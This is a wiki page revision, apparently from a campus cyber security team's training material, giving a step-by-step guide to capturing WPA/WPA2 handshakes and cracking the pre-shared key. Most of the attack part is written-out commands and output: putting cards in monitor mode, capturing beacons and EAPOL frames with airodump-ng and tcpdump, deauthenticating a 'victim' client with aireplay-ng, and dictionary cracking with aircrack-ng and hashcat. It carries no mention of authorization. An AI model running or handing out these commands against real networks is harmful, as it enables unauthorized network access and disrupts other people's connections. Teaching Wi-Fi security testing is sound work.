Difference between revisions of "WPA/WPA2 PSK deauthentication attack"
(Added WPA2 cracking without aircrack-ng plus further improvements) |
|||
Line 1: | Line 1: | ||
== | <div class="toccolours mw-collapsible mw-collapsed" style="border-color: #eaecf0; background-color: white; overflow:auto;"> | ||
<div style="font-weight: normal;line-height:1.6;">ⓘ Table of Contents</div> | |||
<div class="mw-collapsible-content"> | |||
__TOC__ | |||
</div> | |||
</div> | |||
</div> | |||
= Summary = | |||
= | <p style="text-align: justify">How to sniff a WPA/WPA2 handshake using a deauthentication attack and crack the Pre-Shared Key (PSK). Aircrack-ng forms a versatile application suite for analyzing and attacking wireless networks but is not the only option in this game. This guide will use GNU/Linux to demonstrate how to use aircrack-ng and macOS to show that this process can be done more efficiently without aircrack-ng. Anyway, these processes can be mixed to get the best process for your situation.</p> | ||
* | = Requirements = | ||
== Mandatory == | |||
=== GNU/Linux === | |||
* Install aircrack-ng suite: <code>sudo apt install aircrack-ng</code> | |||
== Description == | <table class="wikitable" style="background-color: white; margin-left: 30px;"> | ||
<tr style="background-color: grey; font-weight: bold; border-color: black"> | |||
<td style="border-color: black">Application</td> | |||
<td style="border-color: black">Description</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: darkgrey; border-color: black">aircrack-ng</td> | |||
<td style="background-color: white;border-color: black">802.11 WEP and WPA/WPA2-PSK key cracking program.</td> | |||
</tr> | |||
<tr style="line-height: 15px"> | |||
<td style="background-color: white; border: none"></td> | |||
<td style="background-color: white; border: none"></td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airbase-ng</td> | |||
<td style="background-color: white;border-color: black">Aimed at attacking clients as opposed to the AP itself.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airdecap-ng</td> | |||
<td style="background-color: white;border-color: black">Decrypt WEP/WPA/WPA2 capture files.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airdecloak-ng</td> | |||
<td style="background-color: white;border-color: black">Remove WEP CloakingTM from a packet capture file.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airdrop-ng</td> | |||
<td style="background-color: white;border-color: black">A rule based wireless deauthication tool.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">aireplay-ng</td> | |||
<td style="background-color: white;border-color: black">Inject and replay wireless frames.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airgraph-ng</td> | |||
<td style="background-color: white;border-color: black">Graph wireless networks.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airmon-ng</td> | |||
<td style="background-color: white;border-color: black">Enable and disable monitor mode on wireless interfaces.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airodump-ng</td> | |||
<td style="background-color: white;border-color: black">Capture raw 802.11 frames.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airolib-ng</td> | |||
<td style="background-color: white;border-color: black">Precompute WPA/WPA2 passphrases.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airserv-ng</td> | |||
<td style="background-color: white;border-color: black">Wireless card TCP/IP server to use wit multiple applications.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">airtun-ng</td> | |||
<td style="background-color: white;border-color: black">Virtual tunnel interface creator.</td> | |||
</tr> | |||
<tr> | |||
<td style="background-color: lightgrey; border-color: black">packetforge-ng</td> | |||
<td style="background-color: white;border-color: black">Create encrypted packets that can be used for injection.</td> | |||
</tr> | |||
</table> | |||
=== macOS === | |||
* Install Homebrew, the Missing Package Manager for macOS (or Linux): <code>/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"</code> | |||
* Optional: Install <i>aircrack-ng</i> suite: <code>brew install aircrack-ng</code> | |||
* Install <i>tcpdump</i>: <code>brew install tcpdump</code> | |||
* Install <i>wireshark</i> to use <i>mergecap</i>: <code>brew install wireshark</code> | |||
* Enable 'hidden' airport feature: <code>sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport</code> | |||
== Optional == | |||
=== Hashcat === | |||
* Clone GIT repository: <code>git clone https://github.com/hashcat/hashcat.git</code> | |||
* Build: <code>cd ./hashcat && make && make install</code> | |||
* Link: <code>sudo ln -s ./hashcat /usr/local/bin/hashcat</code> | |||
= Background = | |||
== Problem== | |||
<p style="text-align: justify">Attacks on wireless networks use the advantage that the WLAN protocol (IEEE 802.11) is not encrypted. Only the payload is encrypted. In the case of WPA2, this is usually done using AES. To exploit this weakness, a beacon frame must be intercepted by the hacker to identify the name (BSSID), MAC address (SSID) and channel (radio frequency) of the target access point. Afterwards, this information can be used to sniff packets from that network as desired. To get full access to the network, the WPA2 Pre-shared Key (PSK) is still required. To get it, only 3 steps are necessary, plus some time:</p> | |||
# Sniff a beacon management frame containing all information about the network | |||
# Sniff a four-way hanshake containing dynamic payload encryption keys | |||
# Crack the PSK offline, using data dumps acquired in the previous steps | |||
<p style="height: 2px"></p> | |||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: Intercepting a four-way handshake requires at least one authenticated device on the target network. </div> | |||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: The first 2 steps have to be done in range of the target network. The last step takes the longest, but has the advantage that it can be executed anywhere.</div> | |||
==Solution== | |||
<p style="text-align: justify">The most recent encryption standard WPA3 is designed to protect against such offline dictionary attacks to guess the password, since an attack has unlimited attempts to guess the PSK by implementing a new key exchange protocol. WPA2 used an imperfect four-way handshake between clients and access points to enable encrypted connections. WPA3 will eliminate this vulnerability in favor of more secure and widely verified simultaneous authentication through equal handshake. Additionally, this new handshake supports forward-secrecy.</p> | |||
= Procedure = | |||
== With aircrack-ng (on GNU/Linux) == | |||
=== Put your interface in monitor mode === | === Put your interface in monitor mode === | ||
Line 36: | Line 135: | ||
airmon-ng start wlan0mon 9 | airmon-ng start wlan0mon 9 | ||
=== Capture Beacon === | |||
=== | |||
* using wireshark or airodump-ng | * using wireshark or airodump-ng | ||
Line 55: | Line 152: | ||
airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon | airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon | ||
<div style="background-color: #fcf8e3; border: 1px solid #8a6d3b; color: #8a6d3b; padding: 5px 10px; margin-bottom: 5px"><b>Warning</b>: With this method, you cannot be sure that a four-way handshake was recorded. See [[#Deauthentication attack|deauthentication attack]]!</div> | |||
: | |||
=== Crack with aircrack-ng === | === Crack with aircrack-ng === | ||
Line 74: | Line 161: | ||
=== Reset network configuration === | === Reset network configuration === | ||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: Do not forget to turn off monitor mode and restart network manager</div> | |||
* Stop monitor mode | * Stop monitor mode | ||
airmon-ng stop wlan0mon | airmon-ng stop wlan0mon | ||
* Restart network manager for internet access | * Restart network manager for internet access | ||
service network-manager restart | service network-manager restart | ||
== Used Hardware | == Without aircrack-ng (on macOS) == | ||
airport -h | |||
Supported arguments: | |||
-c[<arg>] --channel=[<arg>] Set arbitrary channel on the card | |||
-z --disassociate Disassociate from any network | |||
-I --getinfo Print current wireless status, e.g. signal info, BSSID, port type etc. | |||
-s[<arg>] --scan=[<arg>] Perform a wireless broadcast scan. | |||
Will perform a directed scan if the optional <arg> is provided | |||
-x --xml Print info as XML | |||
-P --psk Create PSK from specified pass phrase and SSID. | |||
The following additional arguments must be specified with this command: | |||
--password=<arg> Specify a WPA password | |||
--ssid=<arg> Specify SSID when creating a PSK | |||
-h --help Show this help | |||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: <i>airmon-ng</i>, <i>airodump-ng</i> and <i>aireplay-ng</i> don't work on mac.</div> | |||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: <i>airport</i> works exclusively on mac.</div> | |||
=== Capture Beacon === | |||
# Scan | |||
sudo airport -s | |||
SSID BSSID RSSI CHANNEL HT CC SECURITY (auth/unicast/group) | |||
▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -72 11 Y de WPA2 (PSK/AES/AES) | |||
▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -57 1 Y de WPA2 (PSK/AES/AES) | |||
▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -66 36 Y de WPA2 (PSK/AES/AES) | |||
=== Capture Handshake === | |||
==== The Easy way ==== | |||
# Sniff - Ctrl-C to stop capturing | |||
sudo airport $INTERFACE sniff $CHANNEL | |||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: It saves the .cap capture file to /tmp and displays the path plus filename.</div> | |||
<div style="background-color: #fcf8e3; border: 1px solid #8a6d3b; color: #8a6d3b; padding: 5px 10px; margin-bottom: 5px"><b>Warning</b>: With this method, you cannot be sure that a four-way handshake was recorded. See [[#Deauthentication attack|deauthentication attack]]!</div> | |||
==== The Good way ==== | |||
<p style="text-align: justify">By using <i>airmon-ng</i> or <i>airport</i> a large number of unnecessary packets are captured. Also, you cannot know for sure if a handshake has been intercepted until you manually abort the scan. This process can be improved with <i>tcpdump</i>.</p> | |||
* Disassociate from any network: (-z --disassociate) | |||
sudo airport -z | |||
* Set arbitrary channel on the card: (-c[<arg>] --channel=[<arg>]) | |||
sudo airport -c<b>$CHANNEL</b> | |||
* Capture a beacon frame from the AP | |||
sudo tcpdump "type mgt subtype beacon and ether src <b>$BSSID</b>" -I -c 1 -i <b>$INTERFACE</b> -w beacon.cap | |||
* Wait for the WPA handshake | |||
sudo tcpdump "ether proto 0x888e and ether host <b>$BSSID</b>" -I -U -vvv -i <b>$INTERFACE</b> -w handshake.cap | |||
* Merge the two files | |||
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap | |||
<div style="background-color: #fcf8e3; border: 1px solid #8a6d3b; color: #8a6d3b; padding: 5px 10px; margin-bottom: 5px"><b>Warning</b>: With this method, tcpdump will make sure too wait until a four-way handshake was recorded. See [[#Deauthentication attack|deauthentication attack]] for more information! A beacon should however be captured quite fast.</div> | |||
=== Crack PSK === | |||
The .cap file obtained in the previous steps can only be cracked directly with <i>aircrack-ng</i>. But this can be done more effectively using <i>hashcat</i> (or John the Ripper). | |||
* Convert .cap to .hcapx file (Part of <i>hashcat-utils</i>) | |||
cap2hccapx capture.cap capture.hccapx | |||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: Alternatively, use the tool online: https://hashcat.net/cap2hccapx/</div> | |||
* Crack using a simple dictionnary attack: | |||
hashcat -m 2500 capture.hccapx wordlist.txt | |||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: Refer to the [https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 official Hashcat documentation] for more examples and variations to crack the PSK.</div> | |||
== Deauthentication attack == | |||
<p style="text-align: justify">Use one of the methods below to force devices on the target network, if any, to de-authenticate. When re-authenticating, a four-way handshake is exchanged between the client and the AP, which can be captured easily. The deauthenticated target may only remark a short network disruption, but nothing more.</p> | |||
<div style="background-color: #fcf8e3; border: 1px solid #8a6d3b; color: #8a6d3b; padding: 5px 10px; margin-bottom: 5px"><b>Warning</b>: Deauther are often mistakenly described as a jammer, even though that is not the case.</div> | |||
<div style="border: 1px solid #31708f; background-color: #d9edf7; color: #31708f; padding: 5px 10px; margin-bottom: 5px; text-align: justify"><b>Note</b>: A four-way handshake can be analysed with Wireshark, filtering for <i>eapol</i> messages.</div> | |||
=== Aircrack-ng === | |||
aireplay-ng -0 1 -a $BSSID -c $VICTIM_MAC wlan0mon | |||
: -0 means deauthentication | |||
: 1 number of deauthentication frames sent | |||
: -a bssid mac address | |||
: -c victim mac address to deauthenticate | |||
=== D-Stike Deauther === | |||
<p style="text-align: justify">D-Stike provides a range of ESP8266 based development board, which come installed with the latest ESP8266 Deauther software developed by Spacehuhn. The source code is availabel on Github. With this software, you can perform different attacks to test WiFi networks. One of them is the deauthentication attack. </p> | |||
* https://github.com/spacehuhn/esp8266_deauther | |||
=== Other tools === | |||
<p style="text-align: justify">JamWiFi is a Software with GUI, which allows you to select one or more nearby wireless networks, thereupon presenting a list of clients which are currently active on the network(s). Furthermore, JamWiFi allows you to disconnect clients by performing a deauthentication attack.</p> | |||
* https://github.com/unixpickle/JamWiFi | |||
* https://github.com/0x0XDev/JamWiFi | |||
= Used Hardware = | |||
Notebook with Wifi interface card | * Notebook, Ubuntu 18.04 bionic amd64, with Wifi interface card | ||
* MacBook Pro (15-inch, 2017), macOS 10.14.6, Airport Extreme (Broadcom BCM43xx 1.0) | |||
* [[DSTIKE Deauther Watch V1]] | |||
= Courses = | |||
* [[Campus Cyber Security Team]] WiFi Hacking 21.06.2019 | * [[Campus Cyber Security Team]] WiFi Hacking 21.06.2019 | ||
= References = | |||
* https://www.aircrack-ng.org/doku.php?id=cracking_wpa | * https://www.aircrack-ng.org/doku.php?id=cracking_wpa | ||
* https://www.aircrack-ng.org/doku.php#aircrack-ng_suite1 | |||
* https://www.netspotapp.com/wifi-encryption-and-security.html | |||
* https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html | |||
* http://www.saltwaterc.eu/capturing-wpa-handshakes-with-os-x.html | |||
* https://github.com/brannondorsey/wifi-cracking | |||
* https://hashcat.net/cap2hccapx/ | |||
* https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 | |||
[[Category:Documentation]] | [[Category:Documentation]] |
Revision as of 16:53, 10 April 2020
Summary
How to sniff a WPA/WPA2 handshake using a deauthentication attack and crack the Pre-Shared Key (PSK). Aircrack-ng forms a versatile application suite for analyzing and attacking wireless networks but is not the only option in this game. This guide will use GNU/Linux to demonstrate how to use aircrack-ng and macOS to show that this process can be done more efficiently without aircrack-ng. Anyway, these processes can be mixed to get the best process for your situation.
Requirements
Mandatory
GNU/Linux
- Install aircrack-ng suite:
sudo apt install aircrack-ng
Application | Description |
aircrack-ng | 802.11 WEP and WPA/WPA2-PSK key cracking program. |
airbase-ng | Aimed at attacking clients as opposed to the AP itself. |
airdecap-ng | Decrypt WEP/WPA/WPA2 capture files. |
airdecloak-ng | Remove WEP CloakingTM from a packet capture file. |
airdrop-ng | A rule based wireless deauthication tool. |
aireplay-ng | Inject and replay wireless frames. |
airgraph-ng | Graph wireless networks. |
airmon-ng | Enable and disable monitor mode on wireless interfaces. |
airodump-ng | Capture raw 802.11 frames. |
airolib-ng | Precompute WPA/WPA2 passphrases. |
airserv-ng | Wireless card TCP/IP server to use wit multiple applications. |
airtun-ng | Virtual tunnel interface creator. |
packetforge-ng | Create encrypted packets that can be used for injection. |
macOS
- Install Homebrew, the Missing Package Manager for macOS (or Linux):
/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
- Optional: Install aircrack-ng suite:
brew install aircrack-ng
- Install tcpdump:
brew install tcpdump
- Install wireshark to use mergecap:
brew install wireshark
- Enable 'hidden' airport feature:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
Optional
Hashcat
- Clone GIT repository:
git clone https://github.com/hashcat/hashcat.git
- Build:
cd ./hashcat && make && make install
- Link:
sudo ln -s ./hashcat /usr/local/bin/hashcat
Background
Problem
Attacks on wireless networks use the advantage that the WLAN protocol (IEEE 802.11) is not encrypted. Only the payload is encrypted. In the case of WPA2, this is usually done using AES. To exploit this weakness, a beacon frame must be intercepted by the hacker to identify the name (BSSID), MAC address (SSID) and channel (radio frequency) of the target access point. Afterwards, this information can be used to sniff packets from that network as desired. To get full access to the network, the WPA2 Pre-shared Key (PSK) is still required. To get it, only 3 steps are necessary, plus some time:
- Sniff a beacon management frame containing all information about the network
- Sniff a four-way hanshake containing dynamic payload encryption keys
- Crack the PSK offline, using data dumps acquired in the previous steps
Solution
The most recent encryption standard WPA3 is designed to protect against such offline dictionary attacks to guess the password, since an attack has unlimited attempts to guess the PSK by implementing a new key exchange protocol. WPA2 used an imperfect four-way handshake between clients and access points to enable encrypted connections. WPA3 will eliminate this vulnerability in favor of more secure and widely verified simultaneous authentication through equal handshake. Additionally, this new handshake supports forward-secrecy.
Procedure
With aircrack-ng (on GNU/Linux)
Put your interface in monitor mode
- Use airmon-ng to put interface in monitor mode
airmon-ng PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Wireless 7260 (rev 83)
- First we need to set interface in monitor mode `iw wlan0 del` and execute the command :
airmon-ng Found phy0 with no interfaces assigned, would you like to assign one to it? [y/n] y PHY Interface Driver Chipset phy0 wlan0mon iwlwifi Intel Corporation Wireless 7260 (rev 83)
- Kill all processes which use physical device
airmon-ng check kill Killing these processes: PID Name 895 wpa_supplican
- Start in monitor mode
airmon-ng start wlan0mon 9
Capture Beacon
- using wireshark or airodump-ng
airodump-ng wlan0mon
- You will need:
- BSSID (MAC address of access point): <bssid>
- Access point channel: <channel>
- MAC address of a victim, wireless client using WPA2
Capture handshake
- Get handshake or connected station
airodump-ng -c <channel> --bssid <bssid> -w psk wlan0mon
Crack with aircrack-ng
- download a password list from somewhere https://github.com/danielmiessler/SecLists/blob/master/Passwords/ and issue following aircrack-ng command to crack the password
aircrack-ng -w <passwordlist path> -b <bssd> psk*.cap
Reset network configuration
- Stop monitor mode
airmon-ng stop wlan0mon
- Restart network manager for internet access
service network-manager restart
Without aircrack-ng (on macOS)
airport -h Supported arguments: -c[<arg>] --channel=[<arg>] Set arbitrary channel on the card -z --disassociate Disassociate from any network -I --getinfo Print current wireless status, e.g. signal info, BSSID, port type etc. -s[<arg>] --scan=[<arg>] Perform a wireless broadcast scan. Will perform a directed scan if the optional <arg> is provided -x --xml Print info as XML -P --psk Create PSK from specified pass phrase and SSID. The following additional arguments must be specified with this command: --password=<arg> Specify a WPA password --ssid=<arg> Specify SSID when creating a PSK -h --help Show this help
Capture Beacon
# Scan sudo airport -s SSID BSSID RSSI CHANNEL HT CC SECURITY (auth/unicast/group) ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -72 11 Y de WPA2 (PSK/AES/AES) ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -57 1 Y de WPA2 (PSK/AES/AES) ▊▊▊▊▊▊▊▊ 70:3a:cb:▊▊:▊▊:▊▊ -66 36 Y de WPA2 (PSK/AES/AES)
Capture Handshake
The Easy way
# Sniff - Ctrl-C to stop capturing sudo airport $INTERFACE sniff $CHANNEL
The Good way
By using airmon-ng or airport a large number of unnecessary packets are captured. Also, you cannot know for sure if a handshake has been intercepted until you manually abort the scan. This process can be improved with tcpdump.
- Disassociate from any network: (-z --disassociate)
sudo airport -z
- Set arbitrary channel on the card: (-c[<arg>] --channel=[<arg>])
sudo airport -c$CHANNEL
- Capture a beacon frame from the AP
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i $INTERFACE -w beacon.cap
- Wait for the WPA handshake
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i $INTERFACE -w handshake.cap
- Merge the two files
mergecap -a -F pcap -w capture.cap beacon.cap handshake.cap
Crack PSK
The .cap file obtained in the previous steps can only be cracked directly with aircrack-ng. But this can be done more effectively using hashcat (or John the Ripper).
- Convert .cap to .hcapx file (Part of hashcat-utils)
cap2hccapx capture.cap capture.hccapx
- Crack using a simple dictionnary attack:
hashcat -m 2500 capture.hccapx wordlist.txt
Deauthentication attack
Use one of the methods below to force devices on the target network, if any, to de-authenticate. When re-authenticating, a four-way handshake is exchanged between the client and the AP, which can be captured easily. The deauthenticated target may only remark a short network disruption, but nothing more.
Aircrack-ng
aireplay-ng -0 1 -a $BSSID -c $VICTIM_MAC wlan0mon
- -0 means deauthentication
- 1 number of deauthentication frames sent
- -a bssid mac address
- -c victim mac address to deauthenticate
D-Stike Deauther
D-Stike provides a range of ESP8266 based development board, which come installed with the latest ESP8266 Deauther software developed by Spacehuhn. The source code is availabel on Github. With this software, you can perform different attacks to test WiFi networks. One of them is the deauthentication attack.
Other tools
JamWiFi is a Software with GUI, which allows you to select one or more nearby wireless networks, thereupon presenting a list of clients which are currently active on the network(s). Furthermore, JamWiFi allows you to disconnect clients by performing a deauthentication attack.
Used Hardware
- Notebook, Ubuntu 18.04 bionic amd64, with Wifi interface card
- MacBook Pro (15-inch, 2017), macOS 10.14.6, Airport Extreme (Broadcom BCM43xx 1.0)
- DSTIKE Deauther Watch V1
Courses
- Campus Cyber Security Team WiFi Hacking 21.06.2019
References
- https://www.aircrack-ng.org/doku.php?id=cracking_wpa
- https://www.aircrack-ng.org/doku.php#aircrack-ng_suite1
- https://www.netspotapp.com/wifi-encryption-and-security.html
- https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html
- http://www.saltwaterc.eu/capturing-wpa-handshakes-with-os-x.html
- https://github.com/brannondorsey/wifi-cracking
- https://hashcat.net/cap2hccapx/
- https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2